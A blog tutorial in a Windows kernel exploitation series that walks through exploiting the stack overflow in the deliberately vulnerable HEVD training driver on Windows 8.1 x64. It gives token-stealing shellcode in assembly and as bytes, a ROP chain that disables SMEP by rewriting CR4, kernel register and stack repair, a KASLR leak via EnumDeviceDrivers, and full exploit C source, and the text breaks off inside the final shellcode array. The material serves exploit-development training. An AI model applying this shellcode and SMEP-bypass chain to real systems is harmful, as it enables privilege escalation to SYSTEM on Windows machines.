Windows Drivers Series Part 8 - Bypassing SMEP

August 19, 2025 - 29 mins read

Continuing on from the last post, it’s time to make two big changes. We’re moving from Windows 7 to Windows 8.1, and we’re moving from x86 to x64.

Like before, Windows 8.1 isn’t necessarily just available for download, so I’m providing a link to the ISO hosted on my Google Drive here.

We’ll be using the same bug from the HackSysExtremeVulnerableDriver as last time, just modifying it to work on 64 bit Windows 8.1. If you want to read more about the bug, please see the last post.

Setup

These steps should all be familiar by this point, so I’m going to go through them fast.

First, install the VM and set up debugging. I’d recommend using the network debugging instructions from my kernel debugger setup post for this one. You can use modern WinDbg too, which is nice.

Enable Test Signing on the VM so the driver loads. Reboot the VM after running the command:

bcdedit /set testsigning on

Install the 64 bit version of HEVD on the VM. Make sure you use the one in the \driver\vulnerable\x64 directory. You can install and start the service with the following command:

sc create HEVD type= kernel start= auto binPath= C:\Users\stolenfootball\Desktop\HEVD.sys

And then:

sc start HEVD

Decompile the 64 bit version of the driver in IDA. Don’t be lazy with this part, you’ll regret it later. Find the TriggerBufferOverflowStack function, and make sure it looks more or less like the following:

Decompiled vuln

Set the line prefixes to show up in graph mode, then synchronize the assembly and the pseudocode.

Now find the base address the driver is loaded at in the VM with the !lmi command, and rebase the program in IDA.

Finally, take a snapshot of the VM at this point to work off of.

Rev the vulnerable function

I always start by writing a quick program to exercise the vulnerable IOCTL without triggering the overflow. This allows us to see what the program looks like while its working, as well as double check any offsets we’ll need to write the exploit. An example of such a program is in the last post, so I’m not going to reproduce it here.

Make sure to compile with the following in the Visual Studio 2022 Developer Command Prompt so you get a 64 bit program.

cl exploit.c

Let’s set a breakpoint just before the memmove in TriggerBufferOverflowStack, then run the program.

Before looking at the assembly for this function, it’s worth looking at the Windows x64 calling convention documentation, and reviewing the ABI in general. A shorter quick explanation of the x64 fastcall calling convention by Raymond Chen I really like can be found here as well.

Just before the memmove in IDA, we can see that a pointer to KernelBuffer is loaded into rcx. (IDA “helpfully” lables this UserBuffer because UserBuffer was passed in through rcx as an argument, but at this point in the program, UserBuffer is actually in rdi, and IDA is just messing with us).

User buffer

Interestingly in this case, I think it’s a bit clearer in WinDbg.

Windbg version

Regardless, we want to overflow from the start of the KernelBuffer to the return address. The Windows x64 ABI doesn’t use base pointers which slightly complicates the matter, but we can still tell what’s happening by looking at the function prologue.

Function prologue

First, there are three callee registers saved(r12, r14, and r15), for a total of 0x18 (3 * 8) bytes. Then the prologue makes 0x820 bytes worth of space on the stack. Given that KernelBuffer is at rsp+0x20 according to the WinDbg disassembly, it seems as though there should be 0x818 bytes between the KernelBuffer and the return address.

Stack diagram

This means two things:

If we write 0x820 bytes to the KernelBuffer, the last 8 bytes should overwrite the return address. There’s no saved rbp here, base pointers aren’t used.
We will need to reset those callee saved registers later because we’ll end up clobbering them.

Modify the program to write 0x820 bytes of A, and make sure that the last 8 bytes only are set to B. Again, an example of this is in the last post so I’m not going to reproduce it here.

If we run this, we’ll get a crash in WinDbg. Run !analyze -v to analyze the crash, and we get some interesting information.

WinDbg Output

The three callee saved registers are set to all A, which is exactly what we expected. In addition, the top value on the stack (which is the return address) is set to all B at the time of the crash. Looks like our reverse engineering from above was correct!

Modify the exploit for x64

The exploit will be more or less the same as the one outlined in the last post, but there are a couple of significant changes we’ll need to make for 64 bit Windows.

First, the 64 bit VCC compiler does not allow for inline assembly. This means we’re back to the trusty method of compiling our shellcode with NASM and saving it in the program as a byte string.

It’s actually possible to write all of the shellcode in C, which makes it a bit more stable and easy to look at. However, there’s enough complexity there that it’s worthy of its own post, so I’m going to stick with the assembly version for the moment.

Here is the token stealing shellcode for Windows 8:

; Windows 8.1 Token Stealing Shellcode
; Author: @stolenfootball
; Website: https://stolenfootball.github.io

[BITS 64]

%define SYSTEM_PID      0x4

%define KTHREAD_OFFSET  0x188
%define EPROCESS_OFFSET 0xb8
%define FLINK_OFFSET    0x2e8
%define PID_OFFSET      0x2e0
%define TOKEN_OFFSET    0x348

_start:
    push rax                            ; Save register state
    push rbx
    push rcx

    ; Start of Token Stealing Stub 

    mov rax, [gs:KTHREAD_OFFSET]        ; Get KTHREAD of current thread 
    mov rax, [rax + EPROCESS_OFFSET]    ; Get current EPROCESS from KTHREAD
    
    mov rbx, rax                        ; Store current EPROCESS pointer in rbx

    __search_system_pid_loop:
        mov rax, [rax + FLINK_OFFSET]   ; Get the next active process in the list
        sub rax, FLINK_OFFSET           ; Go to the start of the EPROCESS struct
        mov rcx, [rax + PID_OFFSET]     ; Put the PID of this process into rcx
        cmp rcx, SYSTEM_PID             ; Compare the PID of the process to SYSTEM
        jne __search_system_pid_loop

    mov rcx, [rax + TOKEN_OFFSET]       ; Get a pointer to SYSTEM token
    and cl, 0xf0                        ; Clear the reference count
    mov [rbx + TOKEN_OFFSET], rcx       ; Copy SYSTEM token to current process

    ; End of Token Stealing Stub

    pop rcx                             ; Restore registers
    pop rbx
    pop rax
    
    ret

It’s more or less the same shellcode as last time, just with different offsets and 64 bit registers. There’s only one line I added that might not be immediately clear:

    and cl, 0xf0                              ; Clear the reference count

There’s a bit of a quirk with the AccessToken pointer field in the EPROCESS struct. The actual Access Token the field points to is always written to a memory address that is a multiple of 0x10 (as an optimization for stack alignment). This means the bottom 4 bits of the pointer are always 0.

Back in the early days of computers, every bit of memory was expensive, and using memory as efficiently as possible was a high priority. We know these bits are 0, so there’s no need to explicitly store them. This means they can be used for something else. Windows uses those bits to keep track of how many active references there are to the token within the process.

Our exploit code doesn’t have the same number of references to the token as the SYSTEM process, so it’s best to clear them out. If you’re feeling exact, you could probably copy the references from the old token to the new one, but in practice that is rarely done.

You can compile the code with NASM:

nasm shellcode.asm -o shellcode.o

Then open shellcode.o with HxD, highlight the bytes in the text window, and do Edit -> Copy as -> C, then simply paste them into the exploit code.

Copy bytestring

The byte string with the shellcode won’t be executable by default, so we’ll need to allocate some executable memory for it and copy it over. This can be done with the VirtualAlloc and RtlCopyMemory functions:

lpShellcode = VirtualAlloc(NULL, 
                           shellcodeSize,
                           MEM_COMMIT | MEM_RESERVE,
                           PAGE_EXECUTE_READWRITE);

RtlCopyMemory(lpShellcode, TokenStealingPayloadWin8, shellcodeSize);

Take note of the last argument to VirtualAlloc, which assigns RWX permissions to the memory area we’re allocating for the shellcode.

Here is the reworked x64 version of the exploit code so far:

#include <windows.h>
#include <stdio.h>


// Vulnerable IOCTL
#define HEVD_IOCTL_BUFFER_OVERFLOW \
    CTL_CODE( 0x22, 0x800, METHOD_NEITHER, FILE_ANY_ACCESS )

// Sizes for overflow
#define BUFFER_SIZE 0x800

#define POINTER_SIZE 8

CHAR TokenStealingPayloadWin8[] =
{
	0x50, 0x53, 0x51, 0x65, 0x48, 0x8B, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00,
	0x48, 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00, 0x48, 0x89, 0xC3, 0x48, 0x8B,
	0x80, 0xE8, 0x02, 0x00, 0x00, 0x48, 0x2D, 0xE8, 0x02, 0x00, 0x00, 0x48,
	0x8B, 0x88, 0xE0, 0x02, 0x00, 0x00, 0x48, 0x83, 0xF9, 0x04, 0x75, 0xE6,
	0x48, 0x8B, 0x88, 0x48, 0x03, 0x00, 0x00, 0x80, 0xE1, 0xF0, 0x48, 0x89,
	0x8B, 0x48, 0x03, 0x00, 0x00, 0x59, 0x5B, 0x58, 0xC3
};


INT TriggerExploit(HANDLE hDevice);

INT main() 
{
    HANDLE hDevice;
    PCWSTR lpDeviceName = L"\\\\.\\HackSysExtremeVulnerableDriver";

    hDevice = CreateFileW(
        lpDeviceName,
        GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        NULL
    );
    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("[-] Failed to open handle to driver: %lu\n", GetLastError());
        return -1;
    } 

    printf("[+] Device opened successfully!\n");

    if (TriggerExploit(hDevice) >= 0) {
        printf("[+] Exploit completed successfully!\n");
    } else {
        printf("[-] Exploit failed: %lu\n", GetLastError());
    }

    printf("[+] Cleaning up and closing handle...\n");
    CloseHandle(hDevice);

    return 0;
}

INT TriggerExploit(HANDLE hDevice) 
{
    UINT64 *lpInBuffer;
    LPVOID  lpShellcode;
    SIZE_T  inBufferSize;
    DWORD   bytesReturned;
    SIZE_T  shellcodeSize = sizeof(TokenStealingPayloadWin8);


    // Allocate space for the shellcode
    printf("[+] Allocating executable memory for shellcode\n");

    if (!(lpShellcode = VirtualAlloc(NULL, shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE))) {
        printf("[-] Failed to allocate memory for shellcode: %lu\n", GetLastError());
        return -1;
    }

    // Copy shellcode into executable user space memory
    RtlCopyMemory(lpShellcode, TokenStealingPayloadWin8, shellcodeSize);
    printf("[+] Shellcode copied into executable memory\n");


    // Allocate a buffer of the correct size for the overflow.  Need to overflow 
    // the buffer, three callee saved registers, and the return address.
    inBufferSize = BUFFER_SIZE + (3 * POINTER_SIZE) + POINTER_SIZE;
    
    // Alocate the user buffer to be sent to the driver
    if (!(lpInBuffer = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, inBufferSize))) {
        printf("[-] Failed to allocate memory for buffer: %lu\n", GetLastError());
        return -1;
    }
    printf("[+] Created buffer of size: %zu\n", inBufferSize);
    

    // Set buffer to be full of 'A's
    RtlFillMemory(lpInBuffer, inBufferSize, 'A');

    // Set last bytes of buffer to point to the shellcode.
    lpInBuffer[(inBufferSize / POINTER_SIZE) - 1] = (UINT64)lpShellcode;


    printf("[+] Sending buffer with IOCTL: 0x%x\n", HEVD_IOCTL_BUFFER_OVERFLOW);
    BOOL result = DeviceIoControl(
        hDevice,
        HEVD_IOCTL_BUFFER_OVERFLOW,
        lpInBuffer,
        inBufferSize,
        NULL,
        0,
        &bytesReturned,
        NULL
    );
    if (!result) {
        printf("[-] Failed to send IOCTL to HEVD Driver: %lu\n", GetLastError());
        return -1;
    }
    printf("[+] IOCTL sent successfully to HEVD driver!\n");

    printf("[+] Freeing input buffer...\n");
    HeapFree(GetProcessHeap(), 0, lpInBuffer);

    return 0;
}

Let’s set a breakpoint at the end of the vulnerable function and run this.

Vulnfunc end

When we hit the breakpoint, the return address can be easily seen in the stack trace:

Return address

And if we disassemble a few instructions the at the return address, we can see our shellcode. Perfect!

Shellcode

But if we step one more time, instead of entering the shellcode, the VM crashes, and we get the following bugcheck code.

Attempted execute of NX

What happened?

For those of you with an AMD CPU, your VM might have stepped right into the shellcode with no problem. This is because Microsoft’s support for AMD virtualization is extremely subpar, to the point where modern kernel mitigations simply don’t work in VMs on AMD machines.
The kernel mitigations are running on the host, just not the VM, so it is still necessary to bypass them even on AMD. But if you have an AMD CPU, you just have to eyeball disabling the mitigations until you can test on an Intel machine. Follow the rest of the code here and verify that everything looks right, and it should still be pretty stable when it comes time to test.

SMAP / SMEP

In around 2010 Microsoft began using SMEP. SMEP is a CPU feature that allows the OS to prevent execution of memory pages belonging to a user process by the kernel. It is a derivation of SMAP, which prevents all access to user space memory from the kernel.

What this means, in effect, is that the kernel cannot execute any memory that is owned by a user. It’s sort of like DEP/NX, except all user pages are marked as NX from the kernel’s perspective.

That’s why the jump to the user space program didn’t work. When we jumped to the user space shellcode, it was like trying to execute shellcode in a non-executable page.

Disabling SMEP

Fortunately for us, SMEP can be turned on and off as when needed.

SMEP is set with the 20th bit of the CR4 control register. If the bit is a 1 SMEP is enabled, and if it is a 0 SMEP is disabled.

Control registers are special registers included in the x64 processor specification that control processor behavior. There are any number of things control registers can modify, including whether to use the cache, a bunch of different security features, and more. SMEP and SMAP are included in this.

The easiest way to flip the 20th bit of the CR4 register in this situation is with a ROP chain.

What to set SMEP to

First, let’s figure out what value we should set the CR4 register to.

In WinDbg, printing out the CR4 value looks like the following:

CR4 value

SMEP is set by the 20th bit, which is the one pointed to by the red arrow.

The following C macros make it easy to get the new value from the old one.

#define SMEP_BIT 20
#define CR4_ORIG_VALUE 0x00000000001406f8

#define CR4_SMEP_DISABLED (CR4_ORIG_VALUE & ~(1 << SMEP_BIT))

If use Python to get the same result, we’ll see the new value CR4 needs to be set to is 0x406f8.

>>> hex(0x00000000001406f8 & ~(1 << 20))
'0x406f8'

And by setting CR4 to that in WinDbg manually, we can see the SMEP bit has been turned off, but everything else is the same.

CR4 disabled

Ultimately, with the macros in place, all we have to do is define CR4_ORIG_VALUE to be the same as the CR4 value we found with WinDbg.

ROP to disable SMEP

Since gadget offsets change with just about every version of the Windows kernel, when making a kernel ROP chain, a good first step is always to document which version we’re working with in case anyone wants to port our exploit to a different version of Windows down the line.

This can be done easily through the debugger with the vertarget command:

Vertarget

Also take note of the kernel base. We’ll find a way to determine it dynamically later, but for now the base won’t change because we’ve been using the same snapshot for all of the tests, so we can use this base to test if our gadgets work.

Now, copy C:\Windows\System32\ntoskrnl.exe from the VM to your host machine.

Let’s find some gadgets. I used r++ for this because it has a nice Windows executable in the “Releases” section on Github, but you can use any one you want. They all more or less do the same thing. If you’re feeling brave it’s even possible to find gadgets with just WinDbg, but in my opinion there’s no reason to go through more pain than necessary.

.\rp-win.exe --va 0 --file .\ntoskrnl.exe --rop 2 > gadgets.txt

Important options are:

--va 0: give the gadgets in terms of their offsets from the start of the binary
--rop 2: only show gadgets with two instruction depth

Looking through the gadgets.txt file for any mentions of cr4, we find the following:

0x38a3cc: mov cr4, rax ; add rsp, 0x28 ; ret ; (1 found)
0x086557: mov cr4, rax ; mov cr4, rcx ; ret ; (1 found)
0x1e64e9: mov cr4, rax ; mov cr4, rcx ; ret ; (1 found)
0x384f10: mov cr4, rcx ; add rsp, 0x28 ; ret ; (1 found)
0x08655a: mov cr4, rcx ; ret ; (1 found)
0x1e64ec: mov cr4, rcx ; ret ; (1 found)

Either of the last two gadgets will do perfectly. The mov cr4, rcx ; ret gadget allow us to set cr4 to the value that’s in rcx. All we have to do now is find a gadget that puts a value in rcx.

...
0x378df6: pop rcx ; ret ; (1 found)
0x37a82d: pop rcx ; ret ; (1 found)
0x37e694: pop rcx ; ret ; (1 found)
0x384a8e: pop rcx ; ret ; (1 found)
0x38856a: pop rcx ; ret ; (1 found)
0x3895a3: pop rcx ; ret ; (1 found)
0x020b29: pop rcx ; ret ; (1 found)
0x036e83: pop rcx ; ret ; (1 found)
0x07db64: pop rcx ; ret ; (1 found)
...

As expected, there’s about a million of them.

In a normal user mode exploit for a pwn chall, this would be all we need. However, we have to to resume execution of the main kernel after the exploit is complete, so we need to take the previous function’s stack frame into consideration. If we just stack the gadgets starting at the return address, we’ll corrupt the previous function’s stack frame.

Gadget stack corruption

Looking at the previous function in the stack frame’s assembly:

Prev function assembly

We can see we got lucky. The only thing the calling function does after we return is clean up its own stack and return. This means we have 0x28 bytes after the return address to work with for our ROP chain.

Let’s add the gadgets to the code and build the chain.

// ROP Gadgets
// Windows 8.1 Kernel Version 9600 MP (1 procs) Free x64
#define POP_RCX     0x140378df6      // : pop rcx ; ret
#define MOV_CR4_RCX 0x14008655a      // : mov cr4, rcx ; ret

#define CHAIN_SIZE 4 * POINTER_SIZE

And to add the chain to the end of the buffer, we can do the following:

inBufferSize = BUFFER_SIZE + (3 * POINTER_SIZE) + CHAIN_SIZE;

returnAddrIndex = ((BUFFER_SIZE + (3 * POINTER_SIZE) + POINTER_SIZE) / POINTER_SIZE) - 1;

lpInBuffer[returnAddrIndex++] = POP_RCX + kernelBase;
lpInBuffer[returnAddrIndex++] = CR4_SMEP_DISABLED;
lpInBuffer[returnAddrIndex++] = MOV_CR4_RCX + kernelBase;
lpInBuffer[returnAddrIndex++] = (UINT64)lpShellcode;

The exploit code is now the following .

#include <windows.h>
#include <stdio.h>


// Vulnerable IOCTL
#define HEVD_IOCTL_BUFFER_OVERFLOW \
    CTL_CODE( 0x22, 0x800, METHOD_NEITHER, FILE_ANY_ACCESS )

// Sizes for overflow
#define BUFFER_SIZE 2048
#define POINTER_SIZE 8

// SMEP Constants
#define SMEP_BIT 20
#define CR4_ORIG_VALUE 0x00000000001406f8
#define CR4_SMEP_DISABLED (CR4_ORIG_VALUE & ~(1 << SMEP_BIT))

// ROP Gadgets
// Windows 8.1 Kernel Version 9600 MP (1 procs) Free x64
#define POP_RCX     0x000378df6      // : pop rcx ; ret
#define MOV_CR4_RCX 0x00008655a      // : mov cr4, rcx ; ret

// Chain is 2 gadgets + 1 value to store in rcx + address of shellcode
#define CHAIN_SIZE 4 * POINTER_SIZE  


// https://github.com/stolenfootball/HEVDExploits/blob/main/BufferOverflowStack/Windows8x64/shellcode.asm
CHAR TokenStealingPayloadWin8[] =
{
	0x50, 0x53, 0x51, 0x65, 0x48, 0x8B, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00,
	0x48, 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00, 0x48, 0x89, 0xC3, 0x48, 0x8B,
	0x80, 0xE8, 0x02, 0x00, 0x00, 0x48, 0x2D, 0xE8, 0x02, 0x00, 0x00, 0x48,
	0x8B, 0x88, 0xE0, 0x02, 0x00, 0x00, 0x48, 0x83, 0xF9, 0x04, 0x75, 0xE6,
	0x48, 0x8B, 0x88, 0x48, 0x03, 0x00, 0x00, 0x80, 0xE1, 0xF0, 0x48, 0x89,
	0x8B, 0x48, 0x03, 0x00, 0x00, 0x41, 0xBC, 0x00, 0x00, 0x00, 0x00, 0x49,
	0x89, 0xEE, 0x49, 0x81, 0xC6, 0xD0, 0x00, 0x00, 0x00, 0x4D, 0x89, 0xF7,
	0x4D, 0x8B, 0x7F, 0x30, 0x48, 0x83, 0xC4, 0x10, 0x59, 0x5B, 0x58, 0xC3
};


INT TriggerExploit(HANDLE hDevice);
UINT64 GetKernelBaseAddress();

INT main() 
{
    HANDLE hDevice;
    PCWSTR lpDeviceName = L"\\\\.\\HackSysExtremeVulnerableDriver";

    hDevice = CreateFileW(
        lpDeviceName,
        GENERIC_READ | GENERIC_WRITE,
        FILE_SHARE_WRITE,
        NULL,
        OPEN_EXISTING,
        FILE_ATTRIBUTE_NORMAL,
        NULL
    );
    if (hDevice == INVALID_HANDLE_VALUE) {
        printf("[-] Failed to open handle to driver: %lu\n", GetLastError());
        return -1;
    } 

    printf("[+] Device opened successfully!\n");

    if (TriggerExploit(hDevice) >= 0) {
        printf("[+] Exploit completed successfully!\n");
    } else {
        printf("[-] Exploit failed: %lu\n", GetLastError());
    }

    printf("[+] Cleaning up and closing handle...\n");
    CloseHandle(hDevice);

    return 0;
}

INT TriggerExploit(HANDLE hDevice) 
{
    UINT64 *lpInBuffer;
    LPVOID  lpShellcode;
    UINT64  kernelBase = 0xfffff8029ac8d000;
    SIZE_T  inBufferSize;
    SIZE_T  returnAddrIndex;
    DWORD   bytesReturned;
    SIZE_T  shellcodeSize = sizeof(TokenStealingPayloadWin8);


    // Allocate space for the shellcode
    printf("[+] Allocating executable memory for shellcode\n");

    if (!(lpShellcode = VirtualAlloc(NULL, shellcodeSize, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE))) {
        printf("[-] Failed to allocate memory for shellcode: %lu\n", GetLastError());
        return -1;
    }

    // Copy shellcode into executable user space memory
    RtlCopyMemory(lpShellcode, TokenStealingPayloadWin8, shellcodeSize);

    printf("[+] Shellcode copied into executable memory\n");


    // Allocate a buffer of the correct size for the overflow.  Need to overflow 
    // the buffer, three callee saved registers, and enough space for the ROP chain.
    inBufferSize = BUFFER_SIZE + (3 * POINTER_SIZE) + CHAIN_SIZE;
    
    // Alocate the user buffer to be sent to the driver
    if (!(lpInBuffer = HeapAlloc(GetProcessHeap(), HEAP_ZERO_MEMORY, inBufferSize))) {
        printf("[-] Failed to allocate memory for buffer: %lu\n", GetLastError());
        return -1;
    }
    printf("[+] Created buffer of size: %zu\n", inBufferSize);
    

    // Set buffer to be full of 'A's
    RtlFillMemory(lpInBuffer, inBufferSize, 'A');


    // Create the ROP Chain
    if (!(kernelBase = GetKernelBaseAddress())) {
        printf("[-] Failed to calculate kernel base\n");
        return -1;
    }

    // Return address is at the buffer size plus the size of the three callee saved registers to 
    // overwrite plus the size of the return address.  Since the array is of size UINT64, we need
    // to divide by 8 to get the correct index into the array from the raw size in bytes, then 
    // subtract one to account for zero indexing.
    returnAddrIndex = ((BUFFER_SIZE + (3 * POINTER_SIZE) + POINTER_SIZE) / POINTER_SIZE) - 1;

    lpInBuffer[returnAddrIndex++] = POP_RCX + kernelBase;
    lpInBuffer[returnAddrIndex++] = CR4_SMEP_DISABLED;
    lpInBuffer[returnAddrIndex++] = MOV_CR4_RCX + kernelBase;
    lpInBuffer[returnAddrIndex++] = (UINT64)lpShellcode;


    printf("[+] Sending buffer with IOCTL: 0x%x\n", HEVD_IOCTL_BUFFER_OVERFLOW);
        
    BOOL result = DeviceIoControl(
        hDevice,
        HEVD_IOCTL_BUFFER_OVERFLOW,
        lpInBuffer,
        inBufferSize,
        NULL,
        0,
        &bytesReturned,
        NULL
    );
    if (!result) {
        printf("[-] Failed to send IOCTL to HEVD Driver: %lu\n", GetLastError());
        return -1;
    }

    printf("[+] IOCTL sent successfully to HEVD driver!\n");

    printf("[+] Freeing input buffer...\n");
    HeapFree(GetProcessHeap(), 0, lpInBuffer);

    return 0;
}

If you run the code now, you’ll watch it go through the ROP chain, flip the correct bit in cr4, then step into the shellcode without throwing an error.

Cleanup

There are two things we have to do to resume execution from this point.

First, let’s restore the three callee saved registers, r12, r14, and r15.

Set a breakpoint where the vulnerable function starts, and take a look at their values before they are pushed to the stack.

Pre run callee saved regs

r12 is 0, which is easy, we’ll just set that in the shellcode. But r14 and r15 appear to be heap pointers. How can we restore those dynamically? We can’t just set them statically, they’ll be different each time because of KASLR.

Set another breakpoint at the end of our shellcode, and let’s see what values we have to work with at the time we begin execution.

Post run regs

It looks like rbp is close in value to what r14 is supposed to be. In fact, if we check the offsets in Python:

# rbp - r14
>>> hex(0xFFFFE001F0E0CEE0 - 0xFFFFE001F0E0CFB0)
'-0xd0'

Then verify across a couple of runs, we can see this offset doesn’t change. This means we can use rbp to recover r14 in the shellcode.

If you do a bit more rev work, you’ll actually see that at this point rbp is pointing to the IRP and r14 is pointing to the current IO_STACK_LOCATION. Since the two are always stored together in the heap and have a known offset between them, restoring r14 from rbp is safe.

If we try the same trick with r15 though, we’ll see the offset always changes. This means rbp and r15 are part of different heap objects, and we can’t rely on them always being the same distance apart.

So what’s in r15? Looking through all the source in our driver, it looks like r15 is never used. This means it was set somewhere in the kernel before the driver was called.

Before we go reversing ntoskrnl.exe, let’s set a breakpoint at the start of the IrpDeviceIoctlHandler function, which is the first place our driver code will be executed when the IOCTL is sent to it.

Device IOCTL handler

And take a look at the heap memory pointed to by r15.

Memory at r15

Odds are good that we are looking at some kind of struct, as the second 8 bytes appear to be a pointer to another heap address.

Now let’s look at the values stored in the registers.

Registers r15

The sharp eyed among you will see that the value in rcx is the same as the pointer in the 8th-16th bytes of the struct pointed to by r15. Going by the disassembly, we know the value currently in rcx is a pointer to the DEVICE_OBJECT of our driver!

So what type of struct associated with the driver has a pointer to the DEVICE_OBJECT in its 8th-16th bytes? Actually the DRIVER_OBJECT and the FILE_OBJECT both do.

In this case however, it is the FILE_OBJECT. We can confirm this by inspecting the IO_STACK_LOCATION and checking which of the structs corresponds to the value found in r15.

File Object

So how do we get the FILE_OBJECT pointer back in r15?

Fortunately, we just got a pointer to the current IO_STACK_LOCATION back into r14. The IO_STACK_LOCATION struct contains a pointer to the FILE_OBJECT at IO_STACK_LOCATION + 0x30, as can be seen in the screenshot above.

Now that we have all of that figured out, let’s add the following to the kernel recovery stub to reset the registers we clobbered earlier:

; Kernel cleanup 
mov r12, 0                          ; r12 is 0 before it is clobbered

mov r14, rbp                        ; Copy *IRP to r14
add r14, 0xd0                       ; Put pointer to IO_STACK_LOCATION into r14

mov r15, r14                        ; Get pointer to IO_STACK_LOCATION
mov r15, [r15 + 0x30]               ; Get pointer to FILE_OBJECT of driver

Next, we have to fix the stack. Because of the gadgets we have written, our shellcode currently returns into the middle of the previous function’s stack frame, which will inevitibly crash.

We have written 4 pointers as part of the ROP chain, one of which is in the current function’s return address. This means there are 3 pointers for 0x18 bytes of space in the old function’s stack frame.

Old Function’s Stack Frame

However, we already know from the disassembly that the only thing the previous function does after calling the vulnerable function is clean up it’s stack frame and return.

prev function

If we add 0x10 (0x28 - 0x18) bytes to rsp at the end of our shellcode, we should end up back at the previous function’s correct return address, and be able to resume execution in the kernel normally.

Now let’s add this to the kernel recovery stub:

add rsp, 0x10                       ; Fix stack from ROP chain

And run again. This time, you should see it go through with no crashes! If you add system("cmd") somewhere after the exploit triggers, you’ll see a shell spawn with kernel privileges.

Defeating KASLR

So far we’ve been circumventing the fact that the kernel’s base address changes on each run of the program by running off of a snapshot. That said, we want our exploit to run on more than just our snapshot, so it’s not something we can leave hardcoded in.

Those coming from userland pwn are probably concerned right now. Finding a leak to bypass ASLR is one of the more difficult tasks in userland exploit development, and can take nearly as much time as finding the initial memory corruption bug.

Luckily for us, finding kernel base address when you have user level code execution in Windows is not hard. Microsoft doesn’t necessarily provide a function to retrieve it, but its also not information they try hard to protect.

There are any number of ways to do this, but most of them involve using undocumented Windows functions. I always try to use documented functions when possible for stability, so we’ll use a known method of obtaining the kernel base through the EnumDeviceDrivers function.

Microsoft classifies all Windows functions into “documented” and “undocumented” categories. If a function is “documented”, it means it is stable and won’t ever change. If a function is “undocumented” it just means it may be changed in the future.

Here is the EnumDeviceDrivers kernel base address resolution code. I’ve commented where appropriate, but if should be fairly self explanatory.

UINT64 GetKernelBaseAddress() 
{
    ULONG_PTR  pKernelBaseAddress = 0;
    LPVOID    *lpImageBase = NULL;
    DWORD      dwBytesNeeded = 0;

    // First call to EnumDeviceDrivers calculates the amount of space needed to
    // store the results it will have.  It is up to the caller to allocate this
    // space, so this is a necessary step.
    if (!EnumDeviceDrivers(NULL, 0, &dwBytesNeeded)) {
        printf("[-] Failed to retrieve size needed for device driver entries\n");
        return -1;
    }

    // Using the results of the first call to EnumDeviceDrivers, allocate enough 
    // space for EnumDeviceDrivers to store its results in
    if (!(lpImageBase = (LPVOID *)HeapAlloc(GetProcessHeap(), 0, dwBytesNeeded))) {
        printf("[-] Failed to allocate space for lpImageBase\n");
        if (lpImageBase) 
            HeapFree(GetProcessHeap(), 0, lpImageBase);
        return -1;
    }

    // Make the call to EnumDeviceDrivers, get a list of all loaded drivers in
    // the kernel
    if (!EnumDeviceDrivers(lpImageBase, dwBytesNeeded, &dwBytesNeeded)) {
        printf("[-] EnumDeviceDrivers failed: %d", GetLastError());
        if (lpImageBase) 
             HeapFree(GetProcessHeap(), 0, lpImageBase);
        return -1;
    }

    // The kernel base is the first field of the results of EnumDeviceDrivers
    pKernelBaseAddress = ((ULONG_PTR *)lpImageBase)[0];
    HeapFree(GetProcessHeap(), 0, lpImageBase);

    printf("[+] Kernel Base Address calculated: %llx\n", pKernelBaseAddress);

    return (UINT64)pKernelBaseAddress;
}

Final exploit

Here is the final exploit, all commented up and ready for distribution.

#include <windows.h>
#include <stdio.h>
#include <psapi.h>

//////////////////////////////////////////////////////////////////// 
//                                                                //
//    Title:    HEVD x64 Stack Overflow                           //
//    Platform: Windows 8.1 Version 9600 MP (1 procs) Free x64    //
//    Author:   Jeremy Dunn (@stolenfootball)                     //
//    Website:  https://stolenfootball.github.io                  //
//                                                                //
////////////////////////////////////////////////////////////////////

/*  
 *  This program exploits a standard stack based buffer overflow in the 0x800 
 *  IOCTL of the HEVD (https://github.com/hacksysteam/HackSysExtremeVulnerableDriver)
 *  driver.  The exploit is valid on Windows 8.1 x64 kernels.  For kernel versions 
 *  other than the one listed above, ROP gadget offsets may need to be changed.
 * 
 *  The driver takes in an arbitrary buffer from the user and performs an unchecked
 *  memmove into a statically sized stack-based buffer in the kernel.
 * 
 *  The kernel stack buffer is 0x800 bytes long.  There are three callee saved 
 *  registers (r12, r14, and r15) that are overwritten for a total of 0x18 bytes.
 *  As such, bytes 0x818 through bytes 0x820 overflow the return address.
 * 
 *  The original values in the callee saved registers are:
 *      r12: set to 0
 *      r14: holds a pointer to the current IO_STACK_LOCATION
 *      r15: holds a pointer to the FILE_OBJECT associated with the driver
 * 
 *  All three registers are restored through the shellcode.
 * 
 *  This exploit uses the documented method of EnumDeviceDrivers to determine the 
 *  kernel base address.  It uses a ROP chain in ntkrnl.exe to disable SMEP.
 */ 


// Vulnerable IOCTL
#define HEVD_IOCTL_BUFFER_OVERFLOW \
    CTL_CODE( 0x22, 0x800, METHOD_NEITHER, FILE_ANY_ACCESS )

// Sizes for overflow
#define BUFFER_SIZE 2048
#define POINTER_SIZE 8

// SMEP Constants
#define SMEP_BIT 20
#define CR4_ORIG_VALUE 0x00000000001406f8
#define CR4_SMEP_DISABLED (CR4_ORIG_VALUE & ~(1 << SMEP_BIT))

// ROP Gadgets
// Windows 8.1 Kernel Version 9600 MP (1 procs) Free x64
#define POP_RCX     0x000378df6      // : pop rcx ; ret
#define MOV_CR4_RCX 0x00008655a      // : mov cr4, rcx ; ret

// Chain is 2 gadgets + 1 value to store in rcx + address of shellcode
#define CHAIN_SIZE 4 * POINTER_SIZE  


// https://github.com/stolenfootball/HEVDExploits/blob/main/BufferOverflowStack/Windows8x64/shellcode.asm
CHAR TokenStealingPayloadWin8[] =
{
	0x50, 0x53, 0x51, 0x65, 0x48, 0x8B, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00,
	0x48, 0x8B, 0x80, 0xB8, 0x00, 0x00, 0x00, 0x48, 0x89, 0xC3, 0x48, 0x8B,
	0x80, 0xE8, 0x02, 0x00, 0x00, 0x48, 0x2D, 0xE8, 0x02, 0x00, 0x00, 0x48,
